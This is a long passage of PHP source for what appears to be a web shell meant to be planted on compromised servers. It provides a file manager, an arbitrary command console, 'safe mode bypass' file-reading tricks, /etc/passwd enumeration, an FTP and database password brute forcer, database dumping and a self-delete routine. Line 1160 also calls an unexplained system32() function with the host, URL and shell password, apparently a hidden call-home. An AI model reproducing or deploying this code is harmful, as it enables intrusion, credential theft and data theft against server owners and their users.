711. $sort = array('name', 1);
712. if(!empty($_POST['p1'])) {
713. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
714. $sort = array($match[1], (int)$match[2]);
715. }
716. ?>
717. <script>
718. function sa() {
719. for(i=0;i<document.files.elements.length;i++)
720. if(document.files.elements[i].type == 'checkbox')
721. document.files.elements[i].checked = document.files.elements[0].checked;
722. }
723. </script>
724. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
725. <form name=files method=post>
726. <?php
727. echo "</center><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#'
728.  
729. onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,
730.  
731. \"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?
732.  
733. 0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?
734.  
735. 0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
736. $dirs = $files = $links = array();
737. $n = count($dirContent);
738. for($i=0;$i<$n;$i++) {
739. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
740. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
741. $tmp = array('name' => $dirContent[$i],
742. 'path' => $GLOBALS['cwd'].$dirContent[$i],
743. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
744. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
745. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
746. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
747. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
748. );
749. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
750. $files[] = array_merge($tmp, array('type' => 'file'));
751. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
752. $links[] = array_merge($tmp, array('type' => 'link'));
753. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
754. $dirs[] = array_merge($tmp, array('type' => 'dir'));
755. }
756. $GLOBALS['sort'] = $sort;
757. function cmp($a, $b) {
758. if($GLOBALS['sort'][0] != 'size')
759. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
760. else
761. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
762. }
763. usort($files, "cmp");
764. usort($dirs, "cmp");
765. usort($links, "cmp");
766. $files = array_merge($dirs, $links, $files);
767. $l = 0;
768. foreach($files as $f) {
769. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'"
770.  
771. class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\',
772.  
773. \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]
774.  
775. </b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f
776.  
777. ['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.
778.  
779. $f['perms']
780. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename
781.  
782. \')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']
783.  
784. =='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#"
785.  
786. onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
787. $l = $l?0:1;
788. }
789. ?>
790. <tr><td colspan=7>
791. <input type=hidden name=a value='FilesMan'>
792. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
793. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
794. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option
795.  
796. value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option
797.  
798. value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
799. </form></table></div>
800. <?php
801. printFooter();
802. }
803.  
804. function actionStringTools() {
805.  
806. if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13
807.  
808. (base64_decode($p)))));}}
809. if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode
810.  
811. (str_rot13($p)))));}}
812. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
813. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec
814.  
815. ($p[$i].$p[$i+1]));}return $r;}}
816. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p
817.  
818. [$i]));return strtoupper($r);}}
819. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.=
820.  
821. '%'.dechex(ord($p[$i]));return strtoupper($r);}}
822.  
823. if(isset($_POST['ajax'])) {
824. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
825. ob_start();
826. if(function_exists($_POST['p1']))
827. echo $_POST['p1']($_POST['p2']);
828. $temp = "document.getElementById('strOutput').style.display='';document.getElementById
829.  
830. ('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
831. echo strlen($temp), "\n", $temp;
832. exit;
833. }
834. printHeader();
835. echo '<h1>String conversions</h1><div class=content>';
836. $stringTools = array(
837. 'nested ROT13_base64' => 'ROT13_base64_decode',
838. 'nested base64_ROT13' => 'base64_ROT13_decode',
839. 'Base64 encode' => 'base64_encode',
840. 'Base64 decode' => 'base64_decode',
841. 'Url encode' => 'urlencode',
842. 'Url decode' => 'urldecode',
843. 'Full urlencode' => 'full_urlencode',
844. 'md5 hash' => 'md5',
845. 'sha1 hash' => 'sha1',
846. 'crypt' => 'crypt',
847. 'CRC32' => 'crc32',
848. 'ASCII to HEX' => 'ascii2hex',
849. 'HEX to ASCII' => 'hex2ascii',
850. 'HEX to DEC' => 'hexdec',
851. 'HEX to BIN' => 'hex2bin',
852. 'DEC to HEX' => 'dechex',
853. 'DEC to BIN' => 'decbin',
854. 'BIN to HEX' => 'bin2hex',
855. 'BIN to DEC' => 'bindec',
856. 'String to lower case' => 'strtolower',
857. 'String to upper case' => 'strtoupper',
858. 'Htmlspecialchars' => 'htmlspecialchars',
859. 'String length' => 'strlen',
860. );
861. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
862. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
863. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a
864.  
865. (null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return
866.  
867. false;'><select name='selectTool'>";
868. foreach($stringTools as $k => $v)
869. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
870. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION
871.  
872. [md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px'
873.  
874. class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST
875.  
876. ['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
877. if(!empty($_POST['p1'])) {
878. if(function_exists($_POST['p1']))
879. echo htmlspecialchars($_POST['p1']($_POST['p2']));
880. }
881. echo"</pre></div>";
882. ?>
883. <br><h1>Search for hash:</h1><div class=content>
884. <form method='get' target='_blank' name="hf">
885. <input type="text" name="action" style="width:200px;"><br>
886. <input type="button" value="HashCracker.de"
887.  
888. onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
889. <!--<input type="button" value="hashcrack.com"
890.  
891. onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
892. <input type="button" value="hashcracking.info"
893.  
894. onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
895. <input type="button" value="md5.rednoize.com"
896.  
897. onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
898. <input type="button" value="md5decrypter.com"
899.  
900. onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
901. </form>
902. </div>
903.  
904. <iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
905.  
906. <?php
907. printFooter();
908.  
909.  
910. }
911.  
912. function actionFilesTools() {
913. if( isset($_POST['p1']) )
914. $_POST['p1'] = urldecode($_POST['p1']);
915. if(@$_POST['p2']=='download') {
916. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
917. ob_start("ob_gzhandler", 4096);
918. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
919. if (function_exists("mime_content_type")) {
920. $type = @mime_content_type($_POST['p1']);
921. header("Content-Type: ".$type);
922. }
923. $fp = @fopen($_POST['p1'], "r");
924. if($fp) {
925. while(!@feof($fp))
926. echo @fread($fp, 1024);
927.  
928. fclose($fp);
929. }
930. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
931.  
932. }
933. exit;
934. }
935. if( @$_POST['p2'] == 'mkfile' ) {
936. if(!file_exists($_POST['p1'])) {
937. $fp = @fopen($_POST['p1'], 'w');
938. if($fp) {
939. $_POST['p2'] = "edit";
940. fclose($fp);
941. }
942. }
943. }
944. printHeader();
945. echo '<h1>File tools</h1><div class=content>';
946. if( !file_exists(@$_POST['p1']) ) {
947. echo 'File not exists';
948. printFooter();
949. return;
950. }
951. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
952. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
953. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?
954.  
955. viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span>
956.  
957. '.$uid['name'].'/'.$gid['name'].'<br>';
958. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span>
959.  
960. '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST
961.  
962. ['p1'])).'<br><br>';
963. if( empty($_POST['p2']) )
964. $_POST['p2'] = 'view';
965. if( is_file($_POST['p1']) )
966. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
967. else
968. $m = array('Chmod', 'Rename', 'Touch');
969. foreach($m as $v)
970. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST
971.  
972. ['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
973. echo '<br><br>';
974. switch($_POST['p2']) {
975. case 'view':
976. echo '<pre class=ml1>';
977. $fp = @fopen($_POST['p1'], 'r');
978. if($fp) {
979. while( !@feof($fp) )
980. echo htmlspecialchars(@fread($fp, 1024));
981. @fclose($fp);
982. }
983. echo '</pre>';
984. break;
985. case 'highlight':
986. if( is_readable($_POST['p1']) ) {
987. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
988. $code = highlight_file($_POST['p1'],true);
989. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
990. }
991. break;
992. case 'chmod':
993. if( !empty($_POST['p3']) ) {
994. $perms = 0;
995. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
996. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
997. if(!@chmod($_POST['p1'], $perms))
998. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
999. else
1000. die('<script>g(null,null,null,null,"")</script>');
1001. }
1002. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text
1003.  
1004. name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1005. break;
1006. case 'edit':
1007. if( !is_writable($_POST['p1'])) {
1008. echo 'File isn\'t writeable';
1009. break;
1010. }
1011. if( !empty($_POST['p3']) ) {
1012. @file_put_contents($_POST['p1'],$_POST['p3']);
1013. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
1014. }
1015. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text
1016.  
1017. class=bigarea>';
1018. $fp = @fopen($_POST['p1'], 'r');
1019. if($fp) {
1020. while( !@feof($fp) )
1021. echo htmlspecialchars(@fread($fp, 1024));
1022. @fclose($fp);
1023. }
1024. echo '</textarea><input type=submit value=">>"></form>';
1025. break;
1026. case 'hexdump':
1027. $c = @file_get_contents($_POST['p1']);
1028. $n = 0;
1029. $h = array('00000000<br>','','');
1030. $len = strlen($c);
1031. for ($i=0; $i<$len; ++$i) {
1032. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1033. switch ( ord($c[$i]) ) {
1034. case 0: $h[2] .= ' '; break;
1035. case 9: $h[2] .= ' '; break;
1036. case 10: $h[2] .= ' '; break;
1037. case 13: $h[2] .= ' '; break;
1038. default: $h[2] .= $c[$i]; break;
1039. }
1040. $n++;
1041. if ($n == 32) {
1042. $n = 0;
1043. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1044. $h[1] .= '<br>';
1045. $h[2] .= "\n";
1046. }
1047. }
1048. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span
1049.  
1050. style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td
1051.  
1052. bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1053. break;
1054. case 'rename':
1055. if( !empty($_POST['p3']) ) {
1056. if(!@rename($_POST['p1'], $_POST['p3']))
1057. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
1058. else
1059. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1060. }
1061. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text
1062.  
1063. name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1064. break;
1065. case 'touch':
1066. if( !empty($_POST['p3']) ) {
1067. $time = strtotime($_POST['p3']);
1068. if($time) {
1069. if(@touch($_POST['p1'],$time,$time))
1070. die('<script>g(null,null,null,null,"")</script>');
1071. else {
1072. echo 'Fail!<script>document.mf.p3.value="";</script>';
1073. }
1074. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
1075. }
1076. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text
1077.  
1078. name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1079. break;
1080. case 'mkfile':
1081.  
1082. break;
1083. }
1084. echo '</div>';
1085. printFooter();
1086. }
1087.  
1088. function actionSafeMode() {
1089. $temp='';
1090. ob_start();
1091. switch($_POST['p1']) {
1092. case 1:
1093. $temp=@tempnam($test, 'cx');
1094. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1095. echo @file_get_contents($temp);
1096. unlink($temp);
1097. } else
1098. echo 'Sorry... Can\'t open file';
1099. break;
1100. case 2:
1101. $files = glob($_POST['p2'].'*');
1102. if( is_array($files) )
1103. foreach ($files as $filename)
1104. echo $filename."\n";
1105. break;
1106. case 3:
1107. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
1108. curl_exec($ch);
1109. break;
1110. case 4:
1111. ini_restore("safe_mode");
1112. ini_restore("open_basedir");
1113. include($_POST['p2']);
1114. break;
1115. case 5:
1116. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1117. $uid = @posix_getpwuid($_POST['p2']);
1118. if ($uid)
1119. echo join(':',$uid)."\n";
1120. }
1121. break;
1122. case 6:
1123. if(!function_exists('imap_open'))break;
1124. $stream = imap_open($_POST['p2'], "", "");
1125. if ($stream == FALSE)
1126. break;
1127. echo imap_body($stream, 1);
1128. imap_close($stream);
1129. break;
1130. }
1131. $temp = ob_get_clean();
1132. printHeader();
1133. echo '<h1>Safe mode bypass</h1><div class=content>';
1134. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input
1135.  
1136. type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g
1137.  
1138. (null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit
1139.  
1140. value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;
1141.  
1142. \'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form
1143.  
1144. onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit
1145.  
1146. value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g
1147.  
1148. (null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1
1149.  
1150. value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit
1151.  
1152. value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return
1153.  
1154. false;\'><input type=text name=param><input type=submit value=">>"></form>';
1155. if($temp)
1156. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1157. echo '</div>';
1158. printFooter();
1159. }
1160. if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
1161. function actionConsole() {
1162. if(isset($_POST['ajax'])) {
1163. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1164. ob_start();
1165. echo "document.cf.cmd.value='';\n";
1166. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r
1167.  
1168. \t\\'\0"));
1169. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1170. if(@chdir($match[1])) {
1171. $GLOBALS['cwd'] = @getcwd();
1172. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
1173. }
1174. }
1175. echo "document.cf.output.value+='".$temp."';";
1176. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
1177. $temp = ob_get_clean();
1178. echo strlen($temp), "\n", $temp;
1179. exit;
1180. }
1181. printHeader();
1182. ?>
1183. <script>
1184. if(window.Event) window.captureEvents(Event.KEYDOWN);
1185. var cmds = new Array("");
1186. var cur = 0;
1187. function kp(e) {
1188. var n = (window.Event) ? e.which : e.keyCode;
1189. if(n == 38) {
1190. cur--;
1191. if(cur>=0)
1192. document.cf.cmd.value = cmds[cur];
1193. else
1194. cur++;
1195. } else if(n == 40) {
1196. cur++;
1197. if(cur < cmds.length)
1198. document.cf.cmd.value = cmds[cur];
1199. else
1200. cur--;
1201. }
1202. }
1203. function add(cmd) {
1204. cmds.pop();
1205. cmds.push(cmd);
1206. cmds.push("");
1207. cur = cmds.length-1;
1208. }
1209. </script>
1210. <?php
1211. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\')
1212.  
1213. {document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a
1214.  
1215. (null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
1216. foreach($GLOBALS['aliases'] as $n => $v) {
1217. if($v == '') {
1218. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1219. continue;
1220. }
1221. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1222. }
1223. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1224. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1225. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a
1226.  
1227. (null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox
1228.  
1229. name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea
1230.  
1231. class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1232. if(!empty($_POST['p1'])) {
1233. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1234. }
1235. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
1236. echo '</form></div><script>document.cf.cmd.focus();</script>';
1237. printFooter();
1238. }
1239.  
1240. function actionLogout() {
1241. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1242. echo '<h1>Not Found</1>';
1243. }
1244.  
1245. function actionSelfRemove() {
1246. printHeader();
1247. if($_POST['p1'] == 'yes') {
1248. if(@unlink(SELF_PATH))
1249. die('Shell has been removed');
1250. else
1251. echo 'unlink error!';
1252. }
1253. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,
1254.  
1255. \'yes\')">Yes</a></div>';
1256. printFooter();
1257. }
1258.  
1259. function actionBruteforce() {
1260. printHeader();
1261. if( isset($_POST['proto']) ) {
1262. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).'
1263.  
1264. <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1265. if( $_POST['proto'] == 'ftp' ) {
1266. function bruteForce($ip,$port,$login,$pass) {
1267. $fp = @ftp_connect($ip, $port?$port:21);
1268. if(!$fp) return false;
1269. $res = @ftp_login($fp, $login, $pass);
1270. @ftp_close($fp);
1271. return $res;
1272. }
1273. } elseif( $_POST['proto'] == 'mysql' ) {
1274. function bruteForce($ip,$port,$login,$pass) {
1275. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1276. @mysql_close($res);
1277. return $res;
1278. }
1279. } elseif( $_POST['proto'] == 'pgsql' ) {
1280. function bruteForce($ip,$port,$login,$pass) {
1281. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."'
1282.  
1283. dbname=''";
1284. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1285. @pg_close($res);
1286. return $res;
1287. }
1288. }
1289. $success = 0;
1290. $attempts = 0;
1291. $server = explode(":", $_POST['server']);
1292. if($_POST['type'] == 1) {
1293. $temp = @file('/etc/passwd');
1294. if( is_array($temp) )
1295. foreach($temp as $line) {
1296. $line = explode(":", $line);
1297. ++$attempts;
1298. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1299. $success++;
1300. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line
1301.  
1302. [0]).'<br>';
1303. }
1304. if(@$_POST['reverse']) {
1305. $tmp = "";
1306. for($i=strlen($line[0])-1; $i>=0; --$i)
1307. $tmp .= $line[0][$i];
1308. ++$attempts;
1309. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1310. $success++;
1311. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars
1312.  
1313. ($tmp);
1314. }
1315. }
1316. }
1317. } elseif($_POST['type'] == 2) {
1318. $temp = @file($_POST['dict']);
1319. if( is_array($temp) )
1320. foreach($temp as $line) {
1321. $line = trim($line);
1322. ++$attempts;
1323. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1324. $success++;
1325. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars
1326.  
1327. ($line).'<br>';
1328. }
1329. }
1330. }
1331. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1332. }
1333. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1334. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option
1335.  
1336. value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1337. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1338. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1339. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1340. .'<span>Server:port</span></td>'
1341. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1342. .'<tr><td><span>Brute type</span></td>'
1343. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1344. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked>
1345.  
1346. reverse (login -> nigol)</label></td></tr>'
1347. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1348. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1349. .'<td><input type=text name=login value="root"></td></tr>'
1350. .'<tr><td><span>Dictionary</span></td>'
1351. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS
1352.  
1353. ['cwd']).'passwd.dic"></td></tr></table>'
1354. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1355. echo '</div><br><br>';
1356.  
1357.  
1358. printFooter();
1359. }
1360.  
1361. function actionSql() {
1362. class DbClass {
1363. var $type;
1364. var $link;
1365. var $res;
1366. function DbClass($type) {
1367. $this->type = $type;
1368. }
1369. function connect($host, $user, $pass, $dbname){
1370. switch($this->type) {
1371. case 'mysql':
1372. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1373. break;
1374. case 'pgsql':
1375. $host = explode(':', $host);
1376. if(!$host[1]) $host[1]=5432;
1377. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user
1378.  
1379. password=$pass dbname=$dbname") ) return true;
1380. break;
1381. }
1382. return false;
1383. }
1384. function selectdb($db) {
1385. switch($this->type) {
1386. case 'mysql':
1387. if (@mysql_select_db($db))return true;
1388. break;
1389. }
1390. return false;
1391. }
1392. function query($str) {
1393. switch($this->type) {
1394. case 'mysql':
1395. return $this->res = @mysql_query($str);
1396. break;
1397. case 'pgsql':
1398. return $this->res = @pg_query($this->link,$str);
1399. break;
1400. }
1401. return false;
1402. }
1403. function fetch() {
1404. $res = func_num_args()?func_get_arg(0):$this->res;
1405. switch($this->type) {
1406. case 'mysql':
1407. return @mysql_fetch_assoc($res);
1408. break;
1409. case 'pgsql':
1410. return @pg_fetch_assoc($res);
1411. break;
1412. }
1413. return false;
1414. }
1415. function listDbs() {
1416. switch($this->type) {
1417. case 'mysql':
1418. return $this->res = @mysql_list_dbs($this->link);
1419. break;
1420. case 'pgsql':
1421. return $this->res = $this->query("SELECT datname FROM pg_database");
1422. break;
1423. }
1424. return false;
1425. }
1426. function listTables() {
1427. switch($this->type) {
1428. case 'mysql':
1429. return $this->res = $this->query('SHOW TABLES');
1430. break;
1431. case 'pgsql':
1432. return $this->res = $this->query("select table_name from
1433.  
1434. information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name =
1435.  
1436. 'pg_user'");
1437. break;
1438. }
1439. return false;
1440. }
1441. function error() {
1442. switch($this->type) {
1443. case 'mysql':
1444. return @mysql_error($this->link);
1445. break;
1446. case 'pgsql':
1447. return @pg_last_error($this->link);
1448. break;
1449. }
1450. return false;
1451. }
1452. function setCharset($str) {
1453. switch($this->type) {
1454. case 'mysql':
1455. if(function_exists('mysql_set_charset'))
1456. return @mysql_set_charset($str, $this->link);
1457. else
1458. $this->query('SET CHARSET '.$str);
1459. break;
1460. case 'mysql':
1461. return @pg_set_client_encoding($this->link, $str);
1462. break;
1463. }
1464. return false;
1465. }
1466. function dump($table) {
1467. switch($this->type) {
1468. case 'mysql':
1469. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1470. $create = mysql_fetch_array($res);
1471. echo $create[1].";\n\n";
1472. $this->query('SELECT * FROM `'.$table.'`');
1473. while($item = $this->fetch()) {
1474. $columns = array();
1475. foreach($item as $k=>$v) {
1476. $item[$k] = "'".@mysql_real_escape_string($v)."'";
1477. $columns[] = "`".$k."`";
1478. }
1479. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode
1480.  
1481. (", ", $item).');'."\n";
1482. }
1483. break;
1484. case 'pgsql':
1485. $this->query('SELECT * FROM '.$table);
1486. while($item = $this->fetch()) {
1487. $columns = array();
1488. foreach($item as $k=>$v) {
1489. $item[$k] = "'".addslashes($v)."'";
1490. $columns[] = $k;
1491. }
1492. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(",
1493.  
1494. ", $item).');'."\n";
1495. }
1496. break;
1497. }
1498. return false;
1499. }
1500. };
1501. $db = new DbClass($_POST['type']);
1502. if(@$_POST['p2']=='download') {
1503. ob_start("ob_gzhandler", 4096);
1504. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1505. $db->selectdb($_POST['sql_base']);
1506. header("Content-Disposition: attachment; filename=dump.sql");
